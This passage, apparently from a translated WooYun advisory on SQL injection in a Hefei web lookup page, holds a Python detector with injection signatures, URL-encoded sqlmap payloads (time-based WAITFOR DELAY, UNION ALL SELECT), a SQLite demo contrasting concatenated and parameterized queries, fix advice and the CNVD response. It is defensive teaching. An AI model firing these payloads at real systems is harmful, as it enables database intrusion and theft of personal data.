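# Signatures for the techniques sqlmap confirmed in the log above.
SIGNATURES = [
    ("time-based blind / stacked query", re.compile(r"waitfor\s+delay", re.I)),
    ("union-based", re.compile(r"union\s+(?:all\s+)?select", re.I)),
    ("CHAR() string building", re.compile(r"char\(\d+\)\s*\+\s*char\(", re.I)),
    ("quote-and-comment terminator", re.compile(r"'\s*(?:;|--)")),
]


def parse_body(body):
    """Decode an application/x-www-form-urlencoded body; first value per key."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def inspect_request(body):
    """Return (parameter, finding) pairs for one request body; [] means clean."""
    findings = []
    for name, value in parse_body(body).items():
        for label, pattern in SIGNATURES:
            if pattern.search(value):
                findings.append((name, label))
        fmt = FIELD_FORMATS.get(name)
        if fmt is not None and not fmt.match(value):
            findings.append((name, "format violation"))
    return findings


def scan(requests):
    """Group findings by source address over (ip, body) pairs."""
    report = {}
    for ip, body in requests:
        hits = inspect_request(body)
        if hits:
            report.setdefault(ip, set()).update(hits)
    return report


# Constructed sample traffic: one legitimate lookup, then the three payload
# shapes from the sqlmap log, encoded the way a browser or sqlmap sends them.
SAMPLE_REQUESTS = [
    ("198.51.100.10", "zgyhzh=800978023&xm=%E5%BC%A0%E4%B8%89&sjhm=13800000000"),
    ("203.0.113.7", "zgyhzh=1%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27--&xm=2&sjhm=3"),
    ("203.0.113.7", "zgyhzh=1%27+WAITFOR+DELAY+%270%3A0%3A5%27--&xm=2&sjhm=3"),
    ("203.0.113.8", "zgyhzh=1&xm=2&sjhm=3%27+UNION+ALL+SELECT+77%2C77%2CCHAR%28113%29%2BCHAR%28119%29--"),
]

if __name__ == "__main__":
    for ip, hits in scan(SAMPLE_REQUESTS).items():
        print(ip, sorted(hits))
```

The format allow-list does most of the work on its own: every probe in the log fails it, and it needs no knowledge of SQL dialects, whereas the signatures only tell you which technique was tried. A time-based probe that is blocked at this layer also never reaches the database, so the five-second delays sqlmap relied on above no longer leak anything.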

Proof of vulnerability:

As above.

Fix recommendation:

Fix by filtering the input,
and change the privileges (the application currently runs as sa).
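
What "filtering" amounts to for a lookup like getPw.jsp is a parameterized query, so that the value is never part of the statement text. The SQLite model below is an added example, not the report's or the system's own code: it places the concatenated query beside the parameterized one and runs the report's UNION probe shape through both. The accounts table, its three columns (named after the request parameters) and its rows are constructed.

```python
# Added example (not code from the WooYun report or the Hefei system): a
# SQLite model of a three-field account lookup, showing string concatenation
# beside a parameterized query. Table, columns and rows are constructed.
import sqlite3


def make_db():
    """In-memory stand-in for the real table; column names follow the POST parameters."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (zgyhzh TEXT, xm TEXT, sjhm TEXT)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?, ?)", [
        ("800978023", "张三", "13800000001"),
        ("888880003", "李四", "13800000002"),
    ])
    return conn


def lookup_concat(conn, zgyhzh, xm, sjhm):
    """Vulnerable pattern: user input is spliced into the statement text."""
    sql = ("SELECT zgyhzh FROM accounts WHERE zgyhzh = '%s' AND xm = '%s' AND sjhm = '%s'"
           % (zgyhzh, xm, sjhm))
    return [row[0] for row in conn.execute(sql)]


def lookup_param(conn, zgyhzh, xm, sjhm):
    """Hardened pattern: placeholders; values travel separately from the SQL text."""
    sql = "SELECT zgyhzh FROM accounts WHERE zgyhzh = ? AND xm = ? AND sjhm = ?"
    return [row[0] for row in conn.execute(sql, (zgyhzh, xm, sjhm))]


# Same shape as the UNION payload sqlmap reported, adapted to the constructed table.
UNION_PROBE = "x' UNION ALL SELECT sjhm FROM accounts--"


def demo():
    """Run a legitimate lookup and the probe through both implementations."""
    conn = make_db()
    return {
        "legit_concat": lookup_concat(conn, "800978023", "张三", "13800000001"),
        "legit_param": lookup_param(conn, "800978023", "张三", "13800000001"),
        # Concatenation: the WHERE clause is commented out and every mobile number leaks.
        "probe_concat": lookup_concat(conn, UNION_PROBE, "2", "3"),
        # Placeholders: the probe is compared as a literal and matches nothing.
        "probe_param": lookup_param(conn, UNION_PROBE, "2", "3"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

SQLite's execute() refuses stacked statements, so only the UNION case is shown; on the SQL Server 2000 backend in the report the same placeholder change is what removes the injection, and the second half of the fix, a least-privileged login instead of sa, is what takes xp_cmdshell and the other databases out of reach should another injection slip through.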

Copyright notice: when reposting, credit 路人甲@乌云 (WooYun)


Responses

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-08-19 09:43

Vendor reply:

CNVD has confirmed and reproduced the described situation; it has been forwarded via CNCERT to the Anhui branch center, which will coordinate handling with the organization that operates the website.

Latest status:

None yet